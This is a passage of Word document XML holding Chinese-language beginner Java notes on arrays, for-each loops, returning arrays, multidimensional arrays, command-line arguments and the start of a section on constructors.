      </w:r>
      <w:r>
        <w:t>计算所有元素的总和</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D9C14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      double total = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD97452" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for (int i = 0; i &lt; myList.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D504B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         total += myList[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B5691" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4BFC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println("Total is " + total);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E43F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>查找最大元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A1E1D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      double max = myList[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5562257C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for (int i = 1; i &lt; myList.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144F637" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         if (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>myList[i]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; max) max = myList[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA67299" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35873086" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println("Max is " + max);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D4F76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE1FFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDD047" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>For-Each</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C0370" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for(type element: array)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CE31C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36519A17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println(element);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739133ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2482078E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B68A130" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class TestArray {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC76AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B615BDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      double[] myList = {1.9, 2.9, 3.4, 3.5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410DC350" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480ABD56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>打印所有数组元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E6DF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for (double element: myList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CD7B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println(element);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CA2E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1874C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03406E97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF539F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6797E084" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>数组作为函数的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D0C0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">public static </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reverse(int[] list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661468B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  int[] result = new int[list.length];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38017F48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7CC858" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  for (int i = 0, j = result.length - 1; i &lt; list.length; i++, j--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1EB3FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    result[j] = list[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB8020" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639EFA3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>return result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F28285" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46862765" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A229EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>多维数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F59F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>String[][] str = new String[3][4];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A3B27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DC47BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>多维数组的动态初始化（以二维数组为例）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB9388A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type[][] typeName = new type[typeLength1][typeLength2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BACAEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33076978" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66011A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>String[][] s = new String[2][];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A451A7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[0] = new String[2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815F14B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[1] = new String[3];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6B9D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[0][0] = new String("Good");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A34C3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[0][1] = new String("Luck");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B07463" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[1][0] = new String("to");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DC497" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[1][1] = new String("you");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BD1C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s[1][2] = new String("!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4AF7D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s[0]=new String[2] 和 s[1]=new String[3] 是为最高维分配引用空间，也就是为最高维限制其能保存数据的最长的长度，然后再为其每个数组元素单独分配空间 s0=new String("Good") 等操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4611B59D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307113B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E187C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行执行命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">$ javac CommandLine.java </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE586A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ java CommandLine this is a command line 200 -100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722AEA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[0]: this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789315D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[1]: is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB96C10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[2]: a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D737A02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[3]: command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C4A30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[4]: line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3256D467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[5]: 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481F3967" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args[6]: -100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9F0EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CC52AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C4829" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class CommandLine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8FECC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>String[] args</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213B0E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      for(int i=0; i&lt;args.length; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78764AC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("args[" + i + "]: " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>args[i]</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EE132" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B22A95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521873DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21C80B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>魔术方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0410E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造方法：类的同名方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0975FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>构造方法</w:t>
      </w:r>
      <w:r>
        <w:t>和它所在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类的名字</w:t>
      </w:r>
      <w:r>
        <w:t>相同，但构造方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>没有返回值</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F003F5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>不管你是否自定义构造方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有的类都有构造方法</w:t>
      </w:r>
      <w:r>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:t>自动提供了一个默认构造方法，默认构造方法的访问修饰符和类的访问修饰符相同</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>类为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public</w:t>
      </w:r>
      <w:r>
        <w:t>，构造函数也为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public</w:t>
      </w:r>
      <w:r>
        <w:t>；类改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> protected</w:t>
      </w:r>
      <w:r>
        <w:t>，构造函数也改为</w:t>
      </w:r>
      <w:r>
